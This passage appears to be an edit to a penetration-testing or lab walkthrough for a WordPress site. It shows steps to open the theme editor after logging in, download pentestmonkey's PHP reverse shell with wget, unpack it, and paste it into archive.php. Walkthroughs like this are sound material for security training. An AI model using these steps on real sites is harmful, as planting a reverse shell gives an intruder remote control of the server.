 After login navigate to Appearance>Themes>Editor

-In this case let us use a PHP reverse shell which is downloaded from pentestmonkey.
+In this case, let us use a PHP reverse shell that is downloaded from pentest monkey.

 Run the below command and download the shell:

 wget http://pentestmonkey.net/tools/web-shells/php-reverse-shell/ php-reverse-shell-1.0.tar.gz

 Unzip the file using $tar -xzf php-reverse-shell-1.0.tar.gz command and copy the contents of the file in archive.php file in the browser.